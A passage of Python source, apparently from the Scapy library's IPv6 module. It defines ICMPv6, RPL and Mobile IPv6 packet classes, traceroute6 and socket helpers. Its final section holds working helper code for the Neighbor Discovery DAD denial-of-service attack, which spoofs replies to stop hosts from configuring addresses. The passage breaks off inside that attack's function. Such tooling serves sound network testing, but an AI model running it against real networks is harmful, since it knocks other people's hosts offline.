ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP): 2764 name = "ICMPv6 Node Information Reply - IPv4 addresses" 2765 qtype = 4 2766 2767 2768class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP): 2769 name = "ICMPv6 Node Information Reply - Responder refuses to supply answer" 2770 code = 1 2771 2772 2773class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP): 2774 name = "ICMPv6 Node Information Reply - Qtype unknown to the responder" 2775 code = 2 2776 2777 2778def _niquery_guesser(p): 2779 cls = conf.raw_layer 2780 type = orb(p[0]) 2781 if type == 139: # Node Info Query specific stuff 2782 if len(p) > 6: 2783 qtype, = struct.unpack("!H", p[4:6]) 2784 cls = {0: ICMPv6NIQueryNOOP, 2785 2: ICMPv6NIQueryName, 2786 3: ICMPv6NIQueryIPv6, 2787 4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer) 2788 elif type == 140: # Node Info Reply specific stuff 2789 code = orb(p[1]) 2790 if code == 0: 2791 if len(p) > 6: 2792 qtype, = struct.unpack("!H", p[4:6]) 2793 cls = {2: ICMPv6NIReplyName, 2794 3: ICMPv6NIReplyIPv6, 2795 4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP) 2796 elif code == 1: 2797 cls = ICMPv6NIReplyRefuse 2798 elif code == 2: 2799 cls = ICMPv6NIReplyUnknown 2800 return cls 2801 2802 2803############################################################################# 2804############################################################################# 2805# Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) # 2806############################################################################# 2807############################################################################# 2808 2809# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes 2810rplcodes = {0: "DIS", 2811 1: "DIO", 2812 2: "DAO", 2813 3: "DAO-ACK", 2814 # 4: "P2P-DRO", 2815 # 5: "P2P-DRO-ACK", 2816 # 6: "Measurement", 2817 7: "DCO", 2818 8: "DCO-ACK"} 2819 2820 2821class ICMPv6RPL(_ICMPv6): # RFC 6550 2822 name = 'RPL' 2823 fields_desc = [ByteEnumField("type", 155, icmp6types), 2824 ByteEnumField("code", 0, rplcodes), 2825 XShortField("cksum", None)] 2826 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}} 2827 2828 2829############################################################################# 2830############################################################################# 2831# Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) # 2832############################################################################# 2833############################################################################# 2834 2835# Mobile IPv6 ICMPv6 related classes 2836 2837class ICMPv6HAADRequest(_ICMPv6): 2838 name = 'ICMPv6 Home Agent Address Discovery Request' 2839 fields_desc = [ByteEnumField("type", 144, icmp6types), 2840 ByteField("code", 0), 2841 XShortField("cksum", None), 2842 XShortField("id", None), 2843 BitEnumField("R", 1, 1, {1: 'MR'}), 2844 XBitField("res", 0, 15)] 2845 2846 def hashret(self): 2847 return struct.pack("!H", self.id) + self.payload.hashret() 2848 2849 2850class ICMPv6HAADReply(_ICMPv6): 2851 name = 'ICMPv6 Home Agent Address Discovery Reply' 2852 fields_desc = [ByteEnumField("type", 145, icmp6types), 2853 ByteField("code", 0), 2854 XShortField("cksum", None), 2855 XShortField("id", None), 2856 BitEnumField("R", 1, 1, {1: 'MR'}), 2857 XBitField("res", 0, 15), 2858 IP6ListField('addresses', None)] 2859 2860 def hashret(self): 2861 return struct.pack("!H", self.id) + self.payload.hashret() 2862 2863 def answers(self, other): 2864 if not isinstance(other, ICMPv6HAADRequest): 2865 return 0 2866 return self.id == other.id 2867 2868 2869class ICMPv6MPSol(_ICMPv6): 2870 name = 'ICMPv6 Mobile Prefix Solicitation' 2871 fields_desc = [ByteEnumField("type", 146, icmp6types), 2872 ByteField("code", 0), 2873 XShortField("cksum", None), 2874 XShortField("id", None), 2875 XShortField("res", 0)] 2876 2877 def _hashret(self): 2878 return struct.pack("!H", self.id) 2879 2880 2881class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6): 2882 name = 'ICMPv6 Mobile Prefix Advertisement' 2883 fields_desc = [ByteEnumField("type", 147, icmp6types), 2884 ByteField("code", 0), 2885 XShortField("cksum", None), 2886 XShortField("id", None), 2887 BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}), 2888 XBitField("res", 0, 14)] 2889 2890 def hashret(self): 2891 return struct.pack("!H", self.id) 2892 2893 def answers(self, other): 2894 return isinstance(other, ICMPv6MPSol) 2895 2896# Mobile IPv6 Options classes 2897 2898 2899_mobopttypes = {2: "Binding Refresh Advice", 2900 3: "Alternate Care-of Address", 2901 4: "Nonce Indices", 2902 5: "Binding Authorization Data", 2903 6: "Mobile Network Prefix (RFC3963)", 2904 7: "Link-Layer Address (RFC4068)", 2905 8: "Mobile Node Identifier (RFC4283)", 2906 9: "Mobility Message Authentication (RFC4285)", 2907 10: "Replay Protection (RFC4285)", 2908 11: "CGA Parameters Request (RFC4866)", 2909 12: "CGA Parameters (RFC4866)", 2910 13: "Signature (RFC4866)", 2911 14: "Home Keygen Token (RFC4866)", 2912 15: "Care-of Test Init (RFC4866)", 2913 16: "Care-of Test (RFC4866)"} 2914 2915 2916class _MIP6OptAlign(Packet): 2917 """ Mobile IPv6 options have alignment requirements of the form x*n+y. 2918 This class is inherited by all MIPv6 options to help in computing the 2919 required Padding for that option, i.e. the need for a Pad1 or PadN 2920 option before it. They only need to provide x and y as class 2921 parameters. (x=0 and y=0 are used when no alignment is required)""" 2922 2923 __slots__ = ["x", "y"] 2924 2925 def alignment_delta(self, curpos): 2926 x = self.x 2927 y = self.y 2928 if x == 0 and y == 0: 2929 return 0 2930 delta = x * ((curpos - y + x - 1) // x) + y - curpos 2931 return delta 2932 2933 def extract_padding(self, p): 2934 return b"", p 2935 2936 2937class MIP6OptBRAdvice(_MIP6OptAlign): 2938 name = 'Mobile IPv6 Option - Binding Refresh Advice' 2939 fields_desc = [ByteEnumField('otype', 2, _mobopttypes), 2940 ByteField('olen', 2), 2941 ShortField('rinter', 0)] 2942 x = 2 2943 y = 0 # alignment requirement: 2n 2944 2945 2946class MIP6OptAltCoA(_MIP6OptAlign): 2947 name = 'MIPv6 Option - Alternate Care-of Address' 2948 fields_desc = [ByteEnumField('otype', 3, _mobopttypes), 2949 ByteField('olen', 16), 2950 IP6Field("acoa", "::")] 2951 x = 8 2952 y = 6 # alignment requirement: 8n+6 2953 2954 2955class MIP6OptNonceIndices(_MIP6OptAlign): 2956 name = 'MIPv6 Option - Nonce Indices' 2957 fields_desc = [ByteEnumField('otype', 4, _mobopttypes), 2958 ByteField('olen', 16), 2959 ShortField('hni', 0), 2960 ShortField('coni', 0)] 2961 x = 2 2962 y = 0 # alignment requirement: 2n 2963 2964 2965class MIP6OptBindingAuthData(_MIP6OptAlign): 2966 name = 'MIPv6 Option - Binding Authorization Data' 2967 fields_desc = [ByteEnumField('otype', 5, _mobopttypes), 2968 ByteField('olen', 16), 2969 BitField('authenticator', 0, 96)] 2970 x = 8 2971 y = 2 # alignment requirement: 8n+2 2972 2973 2974class MIP6OptMobNetPrefix(_MIP6OptAlign): # NEMO - RFC 3963 2975 name = 'NEMO Option - Mobile Network Prefix' 2976 fields_desc = [ByteEnumField("otype", 6, _mobopttypes), 2977 ByteField("olen", 18), 2978 ByteField("reserved", 0), 2979 ByteField("plen", 64), 2980 IP6Field("prefix", "::")] 2981 x = 8 2982 y = 4 # alignment requirement: 8n+4 2983 2984 2985class MIP6OptLLAddr(_MIP6OptAlign): # Sect 6.4.4 of RFC 4068 2986 name = "MIPv6 Option - Link-Layer Address (MH-LLA)" 2987 fields_desc = [ByteEnumField("otype", 7, _mobopttypes), 2988 ByteField("olen", 7), 2989 ByteEnumField("ocode", 2, _rfc4068_lla_optcode), 2990 ByteField("pad", 0), 2991 MACField("lla", ETHER_ANY)] # Only support ethernet 2992 x = 0 2993 y = 0 # alignment requirement: none 2994 2995 2996class MIP6OptMNID(_MIP6OptAlign): # RFC 4283 2997 name = "MIPv6 Option - Mobile Node Identifier" 2998 fields_desc = [ByteEnumField("otype", 8, _mobopttypes), 2999 FieldLenField("olen", None, length_of="id", fmt="B", 3000 adjust=lambda pkt, x: x + 1), 3001 ByteEnumField("subtype", 1, {1: "NAI"}), 3002 StrLenField("id", "", 3003 length_from=lambda pkt: pkt.olen - 1)] 3004 x = 0 3005 y = 0 # alignment requirement: none 3006 3007# We only support decoding and basic build. Automatic HMAC computation is 3008# too much work for our current needs. It is left to the user (I mean ... 3009# you). --arno 3010 3011 3012class MIP6OptMsgAuth(_MIP6OptAlign): # RFC 4285 (Sect. 5) 3013 name = "MIPv6 Option - Mobility Message Authentication" 3014 fields_desc = [ByteEnumField("otype", 9, _mobopttypes), 3015 FieldLenField("olen", None, length_of="authdata", fmt="B", 3016 adjust=lambda pkt, x: x + 5), 3017 ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option", # noqa: E501 3018 2: "MN-AAA authentication mobility option"}), # noqa: E501 3019 IntField("mspi", None), 3020 StrLenField("authdata", "A" * 12, 3021 length_from=lambda pkt: pkt.olen - 5)] 3022 x = 4 3023 y = 1 # alignment requirement: 4n+1 3024 3025# Extracted from RFC 1305 (NTP) : 3026# NTP timestamps are represented as a 64-bit unsigned fixed-point number, 3027# in seconds relative to 0h on 1 January 1900. The integer part is in the 3028# first 32 bits and the fraction part in the last 32 bits. 3029 3030 3031class NTPTimestampField(LongField): 3032 def i2repr(self, pkt, x): 3033 if x < ((50 * 31536000) << 32): 3034 return "Some date a few decades ago (%d)" % x 3035 3036 # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to 3037 # January 1st 1970 : 3038 delta = -2209075761 3039 i = int(x >> 32) 3040 j = float(x & 0xffffffff) * 2.0**-32 3041 res = i + j + delta 3042 t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res)) 3043 3044 return "%s (%d)" % (t, x) 3045 3046 3047class MIP6OptReplayProtection(_MIP6OptAlign): # RFC 4285 (Sect. 6) 3048 name = "MIPv6 option - Replay Protection" 3049 fields_desc = [ByteEnumField("otype", 10, _mobopttypes), 3050 ByteField("olen", 8), 3051 NTPTimestampField("timestamp", 0)] 3052 x = 8 3053 y = 2 # alignment requirement: 8n+2 3054 3055 3056class MIP6OptCGAParamsReq(_MIP6OptAlign): # RFC 4866 (Sect. 5.6) 3057 name = "MIPv6 option - CGA Parameters Request" 3058 fields_desc = [ByteEnumField("otype", 11, _mobopttypes), 3059 ByteField("olen", 0)] 3060 x = 0 3061 y = 0 # alignment requirement: none 3062 3063# XXX TODO: deal with CGA param fragmentation and build of defragmented 3064# XXX version. Passing of a big CGAParam structure should be 3065# XXX simplified. Make it hold packets, by the way --arno 3066 3067 3068class MIP6OptCGAParams(_MIP6OptAlign): # RFC 4866 (Sect. 5.1) 3069 name = "MIPv6 option - CGA Parameters" 3070 fields_desc = [ByteEnumField("otype", 12, _mobopttypes), 3071 FieldLenField("olen", None, length_of="cgaparams", fmt="B"), 3072 StrLenField("cgaparams", "", 3073 length_from=lambda pkt: pkt.olen)] 3074 x = 0 3075 y = 0 # alignment requirement: none 3076 3077 3078class MIP6OptSignature(_MIP6OptAlign): # RFC 4866 (Sect. 5.2) 3079 name = "MIPv6 option - Signature" 3080 fields_desc = [ByteEnumField("otype", 13, _mobopttypes), 3081 FieldLenField("olen", None, length_of="sig", fmt="B"), 3082 StrLenField("sig", "", 3083 length_from=lambda pkt: pkt.olen)] 3084 x = 0 3085 y = 0 # alignment requirement: none 3086 3087 3088class MIP6OptHomeKeygenToken(_MIP6OptAlign): # RFC 4866 (Sect. 5.3) 3089 name = "MIPv6 option - Home Keygen Token" 3090 fields_desc = [ByteEnumField("otype", 14, _mobopttypes), 3091 FieldLenField("olen", None, length_of="hkt", fmt="B"), 3092 StrLenField("hkt", "", 3093 length_from=lambda pkt: pkt.olen)] 3094 x = 0 3095 y = 0 # alignment requirement: none 3096 3097 3098class MIP6OptCareOfTestInit(_MIP6OptAlign): # RFC 4866 (Sect. 5.4) 3099 name = "MIPv6 option - Care-of Test Init" 3100 fields_desc = [ByteEnumField("otype", 15, _mobopttypes), 3101 ByteField("olen", 0)] 3102 x = 0 3103 y = 0 # alignment requirement: none 3104 3105 3106class MIP6OptCareOfTest(_MIP6OptAlign): # RFC 4866 (Sect. 5.5) 3107 name = "MIPv6 option - Care-of Test" 3108 fields_desc = [ByteEnumField("otype", 16, _mobopttypes), 3109 FieldLenField("olen", None, length_of="cokt", fmt="B"), 3110 StrLenField("cokt", b'\x00' * 8, 3111 length_from=lambda pkt: pkt.olen)] 3112 x = 0 3113 y = 0 # alignment requirement: none 3114 3115 3116class MIP6OptUnknown(_MIP6OptAlign): 3117 name = 'Scapy6 - Unknown Mobility Option' 3118 fields_desc = [ByteEnumField("otype", 6, _mobopttypes), 3119 FieldLenField("olen", None, length_of="odata", fmt="B"), 3120 StrLenField("odata", "", 3121 length_from=lambda pkt: pkt.olen)] 3122 x = 0 3123 y = 0 # alignment requirement: none 3124 3125 @classmethod 3126 def dispatch_hook(cls, _pkt=None, *_, **kargs): 3127 if _pkt: 3128 o = orb(_pkt[0]) # Option type 3129 if o in moboptcls: 3130 return moboptcls[o] 3131 return cls 3132 3133 3134moboptcls = {0: Pad1, 3135 1: PadN, 3136 2: MIP6OptBRAdvice, 3137 3: MIP6OptAltCoA, 3138 4: MIP6OptNonceIndices, 3139 5: MIP6OptBindingAuthData, 3140 6: MIP6OptMobNetPrefix, 3141 7: MIP6OptLLAddr, 3142 8: MIP6OptMNID, 3143 9: MIP6OptMsgAuth, 3144 10: MIP6OptReplayProtection, 3145 11: MIP6OptCGAParamsReq, 3146 12: MIP6OptCGAParams, 3147 13: MIP6OptSignature, 3148 14: MIP6OptHomeKeygenToken, 3149 15: MIP6OptCareOfTestInit, 3150 16: MIP6OptCareOfTest} 3151 3152 3153# Main Mobile IPv6 Classes 3154 3155mhtypes = {0: 'BRR', 3156 1: 'HoTI', 3157 2: 'CoTI', 3158 3: 'HoT', 3159 4: 'CoT', 3160 5: 'BU', 3161 6: 'BA', 3162 7: 'BE', 3163 8: 'Fast BU', 3164 9: 'Fast BA', 3165 10: 'Fast NA'} 3166 3167# From http://www.iana.org/assignments/mobility-parameters 3168bastatus = {0: 'Binding Update accepted', 3169 1: 'Accepted but prefix discovery necessary', 3170 128: 'Reason unspecified', 3171 129: 'Administratively prohibited', 3172 130: 'Insufficient resources', 3173 131: 'Home registration not supported', 3174 132: 'Not home subnet', 3175 133: 'Not home agent for this mobile node', 3176 134: 'Duplicate Address Detection failed', 3177 135: 'Sequence number out of window', 3178 136: 'Expired home nonce index', 3179 137: 'Expired care-of nonce index', 3180 138: 'Expired nonces', 3181 139: 'Registration type change disallowed', 3182 140: 'Mobile Router Operation not permitted', 3183 141: 'Invalid Prefix', 3184 142: 'Not Authorized for Prefix', 3185 143: 'Forwarding Setup failed (prefixes missing)', 3186 144: 'MIPV6-ID-MISMATCH', 3187 145: 'MIPV6-MESG-ID-REQD', 3188 146: 'MIPV6-AUTH-FAIL', 3189 147: 'Permanent home keygen token unavailable', 3190 148: 'CGA and signature verification failed', 3191 149: 'Permanent home keygen token exists', 3192 150: 'Non-null home nonce index expected'} 3193 3194 3195class _MobilityHeader(Packet): 3196 name = 'Dummy IPv6 Mobility Header' 3197 overload_fields = {IPv6: {"nh": 135}} 3198 3199 def post_build(self, p, pay): 3200 p += pay 3201 tmp_len = self.len 3202 if self.len is None: 3203 tmp_len = (len(p) - 8) // 8 3204 p = p[:1] + struct.pack("B", tmp_len) + p[2:] 3205 if self.cksum is None: 3206 cksum = in6_chksum(135, self.underlayer, p) 3207 else: 3208 cksum = self.cksum 3209 p = p[:4] + struct.pack("!H", cksum) + p[6:] 3210 return p 3211 3212 3213class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg 3214 name = "IPv6 Mobility Header - Generic Message" 3215 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 3216 ByteField("len", None), 3217 ByteEnumField("mhtype", None, mhtypes), 3218 ByteField("res", None), 3219 XShortField("cksum", None), 3220 StrLenField("msg", b"\x00" * 2, 3221 length_from=lambda pkt: 8 * pkt.len - 6)] 3222 3223 3224class MIP6MH_BRR(_MobilityHeader): 3225 name = "IPv6 Mobility Header - Binding Refresh Request" 3226 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 3227 ByteField("len", None), 3228 ByteEnumField("mhtype", 0, mhtypes), 3229 ByteField("res", None), 3230 XShortField("cksum", None), 3231 ShortField("res2", None), 3232 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 3233 _OptionsField("options", [], MIP6OptUnknown, 8, 3234 length_from=lambda pkt: 8 * pkt.len)] 3235 overload_fields = {IPv6: {"nh": 135}} 3236 3237 def hashret(self): 3238 # Hack: BRR, BU and BA have the same hashret that returns the same 3239 # value b"\x00\x08\x09" (concatenation of mhtypes). This is 3240 # because we need match BA with BU and BU with BRR. --arno 3241 return b"\x00\x08\x09" 3242 3243 3244class MIP6MH_HoTI(_MobilityHeader): 3245 name = "IPv6 Mobility Header - Home Test Init" 3246 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 3247 ByteField("len", None), 3248 ByteEnumField("mhtype", 1, mhtypes), 3249 ByteField("res", None), 3250 XShortField("cksum", None), 3251 StrFixedLenField("reserved", b"\x00" * 2, 2), 3252 StrFixedLenField("cookie", b"\x00" * 8, 8), 3253 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 3254 _OptionsField("options", [], MIP6OptUnknown, 16, 3255 length_from=lambda pkt: 8 * (pkt.len - 1))] 3256 overload_fields = {IPv6: {"nh": 135}} 3257 3258 def hashret(self): 3259 return bytes_encode(self.cookie) 3260 3261 3262class MIP6MH_CoTI(MIP6MH_HoTI): 3263 name = "IPv6 Mobility Header - Care-of Test Init" 3264 mhtype = 2 3265 3266 def hashret(self): 3267 return bytes_encode(self.cookie) 3268 3269 3270class MIP6MH_HoT(_MobilityHeader): 3271 name = "IPv6 Mobility Header - Home Test" 3272 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 3273 ByteField("len", None), 3274 ByteEnumField("mhtype", 3, mhtypes), 3275 ByteField("res", None), 3276 XShortField("cksum", None), 3277 ShortField("index", None), 3278 StrFixedLenField("cookie", b"\x00" * 8, 8), 3279 StrFixedLenField("token", b"\x00" * 8, 8), 3280 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 3281 _OptionsField("options", [], MIP6OptUnknown, 24, 3282 length_from=lambda pkt: 8 * (pkt.len - 2))] 3283 overload_fields = {IPv6: {"nh": 135}} 3284 3285 def hashret(self): 3286 return bytes_encode(self.cookie) 3287 3288 def answers(self, other): 3289 if (isinstance(other, MIP6MH_HoTI) and 3290 self.cookie == other.cookie): 3291 return 1 3292 return 0 3293 3294 3295class MIP6MH_CoT(MIP6MH_HoT): 3296 name = "IPv6 Mobility Header - Care-of Test" 3297 mhtype = 4 3298 3299 def hashret(self): 3300 return bytes_encode(self.cookie) 3301 3302 def answers(self, other): 3303 if (isinstance(other, MIP6MH_CoTI) and 3304 self.cookie == other.cookie): 3305 return 1 3306 return 0 3307 3308 3309class LifetimeField(ShortField): 3310 def i2repr(self, pkt, x): 3311 return "%d sec" % (4 * x) 3312 3313 3314class MIP6MH_BU(_MobilityHeader): 3315 name = "IPv6 Mobility Header - Binding Update" 3316 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 3317 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 3318 ByteEnumField("mhtype", 5, mhtypes), 3319 ByteField("res", None), 3320 XShortField("cksum", None), 3321 XShortField("seq", None), # TODO: ShortNonceField 3322 FlagsField("flags", "KHA", 7, "PRMKLHA"), 3323 XBitField("reserved", 0, 9), 3324 LifetimeField("mhtime", 3), # unit == 4 seconds 3325 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 3326 _OptionsField("options", [], MIP6OptUnknown, 12, 3327 length_from=lambda pkt: 8 * pkt.len - 4)] 3328 overload_fields = {IPv6: {"nh": 135}} 3329 3330 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() 3331 return b"\x00\x08\x09" 3332 3333 def answers(self, other): 3334 if isinstance(other, MIP6MH_BRR): 3335 return 1 3336 return 0 3337 3338 3339class MIP6MH_BA(_MobilityHeader): 3340 name = "IPv6 Mobility Header - Binding ACK" 3341 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 3342 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 3343 ByteEnumField("mhtype", 6, mhtypes), 3344 ByteField("res", None), 3345 XShortField("cksum", None), 3346 ByteEnumField("status", 0, bastatus), 3347 FlagsField("flags", "K", 3, "PRK"), 3348 XBitField("res2", None, 5), 3349 XShortField("seq", None), # TODO: ShortNonceField 3350 XShortField("mhtime", 0), # unit == 4 seconds 3351 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 3352 _OptionsField("options", [], MIP6OptUnknown, 12, 3353 length_from=lambda pkt: 8 * pkt.len - 4)] 3354 overload_fields = {IPv6: {"nh": 135}} 3355 3356 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() 3357 return b"\x00\x08\x09" 3358 3359 def answers(self, other): 3360 if (isinstance(other, MIP6MH_BU) and 3361 other.mhtype == 5 and 3362 self.mhtype == 6 and 3363 other.flags & 0x1 and # Ack request flags is set 3364 self.seq == other.seq): 3365 return 1 3366 return 0 3367 3368 3369_bestatus = {1: 'Unknown binding for Home Address destination option', 3370 2: 'Unrecognized MH Type value'} 3371 3372# TODO: match Binding Error to its stimulus 3373 3374 3375class MIP6MH_BE(_MobilityHeader): 3376 name = "IPv6 Mobility Header - Binding Error" 3377 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 3378 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 3379 ByteEnumField("mhtype", 7, mhtypes), 3380 ByteField("res", 0), 3381 XShortField("cksum", None), 3382 ByteEnumField("status", 0, _bestatus), 3383 ByteField("reserved", 0), 3384 IP6Field("ha", "::"), 3385 _OptionsField("options", [], MIP6OptUnknown, 24, 3386 length_from=lambda pkt: 8 * (pkt.len - 2))] 3387 overload_fields = {IPv6: {"nh": 135}} 3388 3389 3390_mip6_mhtype2cls = {0: MIP6MH_BRR, 3391 1: MIP6MH_HoTI, 3392 2: MIP6MH_CoTI, 3393 3: MIP6MH_HoT, 3394 4: MIP6MH_CoT, 3395 5: MIP6MH_BU, 3396 6: MIP6MH_BA, 3397 7: MIP6MH_BE} 3398 3399 3400############################################################################# 3401############################################################################# 3402# Traceroute6 # 3403############################################################################# 3404############################################################################# 3405 3406class AS_resolver6(AS_resolver_riswhois): 3407 def _resolve_one(self, ip): 3408 """ 3409 overloaded version to provide a Whois resolution on the 3410 embedded IPv4 address if the address is 6to4 or Teredo. 3411 Otherwise, the native IPv6 address is passed. 3412 """ 3413 3414 if in6_isaddr6to4(ip): # for 6to4, use embedded @ 3415 tmp = inet_pton(socket.AF_INET6, ip) 3416 addr = inet_ntop(socket.AF_INET, tmp[2:6]) 3417 elif in6_isaddrTeredo(ip): # for Teredo, use mapped address 3418 addr = teredoAddrExtractInfo(ip)[2] 3419 else: 3420 addr = ip 3421 3422 _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr) 3423 3424 if asn.startswith("AS"): 3425 try: 3426 asn = int(asn[2:]) 3427 except ValueError: 3428 pass 3429 3430 return ip, asn, desc 3431 3432 3433class TracerouteResult6(TracerouteResult): 3434 __slots__ = [] 3435 3436 def show(self): 3437 return self.make_table(lambda s, r: (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! # noqa: E501 3438 s.hlim, 3439 r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}" + # noqa: E501 3440 "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" + # noqa: E501 3441 "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" + # noqa: E501 3442 "{ICMPv6EchoReply:%ir,type%}"))) # noqa: E501 3443 3444 def get_trace(self): 3445 trace = {} 3446 3447 for s, r in self.res: 3448 if IPv6 not in s: 3449 continue 3450 d = s[IPv6].dst 3451 if d not in trace: 3452 trace[d] = {} 3453 3454 t = not (ICMPv6TimeExceeded in r or 3455 ICMPv6DestUnreach in r or 3456 ICMPv6PacketTooBig in r or 3457 ICMPv6ParamProblem in r) 3458 3459 trace[d][s[IPv6].hlim] = r[IPv6].src, t 3460 3461 for k in trace.values(): 3462 try: 3463 m = min(x for x, y in k.items() if y[1]) 3464 except ValueError: 3465 continue 3466 for li in list(k): # use list(): k is modified in the loop 3467 if li > m: 3468 del k[li] 3469 3470 return trace 3471 3472 def graph(self, ASres=AS_resolver6(), **kargs): 3473 TracerouteResult.graph(self, ASres=ASres, **kargs) 3474 3475 3476@conf.commands.register 3477def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(), 3478 l4=None, timeout=2, verbose=None, **kargs): 3479 """Instant TCP traceroute using IPv6 3480 traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None 3481 """ 3482 if verbose is None: 3483 verbose = conf.verb 3484 3485 if l4 is None: 3486 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / TCP(seq=RandInt(), sport=sport, dport=dport), # noqa: E501 3487 timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) # noqa: E501 3488 else: 3489 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / l4, 3490 timeout=timeout, verbose=verbose, **kargs) 3491 3492 a = TracerouteResult6(a.res) 3493 3494 if verbose: 3495 a.show() 3496 3497 return a, b 3498 3499############################################################################# 3500############################################################################# 3501# Sockets # 3502############################################################################# 3503############################################################################# 3504 3505 3506if not WINDOWS: 3507 from scapy.supersocket import L3RawSocket 3508 3509 class L3RawSocket6(L3RawSocket): 3510 def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501 3511 # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501 3512 self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501 3513 self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 3514 self.iface = iface 3515 3516 3517def IPv6inIP(dst='203.178.135.36', src=None): 3518 _IPv6inIP.dst = dst 3519 _IPv6inIP.src = src 3520 if not conf.L3socket == _IPv6inIP: 3521 _IPv6inIP.cls = conf.L3socket 3522 else: 3523 del conf.L3socket 3524 return _IPv6inIP 3525 3526 3527class _IPv6inIP(SuperSocket): 3528 dst = '127.0.0.1' 3529 src = None 3530 cls = None 3531 3532 def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): # noqa: E501 3533 SuperSocket.__init__(self, family, type, proto) 3534 self.worker = self.cls(**args) 3535 3536 def set(self, dst, src=None): 3537 _IPv6inIP.src = src 3538 _IPv6inIP.dst = dst 3539 3540 def nonblock_recv(self): 3541 p = self.worker.nonblock_recv() 3542 return self._recv(p) 3543 3544 def recv(self, x): 3545 p = self.worker.recv(x) 3546 return self._recv(p, x) 3547 3548 def _recv(self, p, x=MTU): 3549 if p is None: 3550 return p 3551 elif isinstance(p, IP): 3552 # TODO: verify checksum 3553 if p.src == self.dst and p.proto == socket.IPPROTO_IPV6: 3554 if isinstance(p.payload, IPv6): 3555 return p.payload 3556 return p 3557 3558 def send(self, x): 3559 return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6) / x) # noqa: E501 3560 3561 3562############################################################################# 3563############################################################################# 3564# Neighbor Discovery Protocol Attacks # 3565############################################################################# 3566############################################################################# 3567 3568def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None, 3569 tgt_filter=None, reply_mac=None): 3570 """ 3571 Internal generic helper accepting a specific callback as first argument, 3572 for NS or NA reply. See the two specific functions below. 3573 """ 3574 3575 def is_request(req, mac_src_filter, tgt_filter): 3576 """ 3577 Check if packet req is a request 3578 """ 3579 3580 # Those simple checks are based on Section 5.4.2 of RFC 4862 3581 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): 3582 return 0 3583 3584 # Get and compare the MAC address 3585 mac_src = req[Ether].src 3586 if mac_src_filter and mac_src != mac_src_filter: 3587 return 0 3588 3589 # Source must be the unspecified address 3590 if req[IPv6].src != "::": 3591 return 0 3592 3593 # Check destination is the link-local solicited-node multicast 3594 # address associated with target address in received NS 3595 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) 3596 if tgt_filter and tgt != tgt_filter: 3597 return 0 3598 received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst) 3599 expected_snma = in6_getnsma(tgt) 3600 if received_snma != expected_snma: 3601 return 0 3602 3603 return 1 3604 3605 if not iface: 3606 iface = conf.iface 3607 3608 # To prevent sniffing our own traffic 3609 if not reply_mac: 3610 reply_mac = get_if_hwaddr(iface) 3611 sniff_filter = "icmp6 and not ether src %s" % reply_mac 3612 3613 sniff(store=0, 3614 filter=sniff_filter, 3615 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), 3616 prn=lambda x: reply_callback(x, reply_mac, iface), 3617 iface=iface) 3618 3619 3620def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None, 3621 reply_mac=None): 3622 """ 3623 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 3624 3756. This is done by listening incoming NS messages sent from the 3625 unspecified address and sending a NS reply for the target address, 3626 leading the peer to believe that another node is also performing DAD 3627 for that address. 3628 3629 By default, the 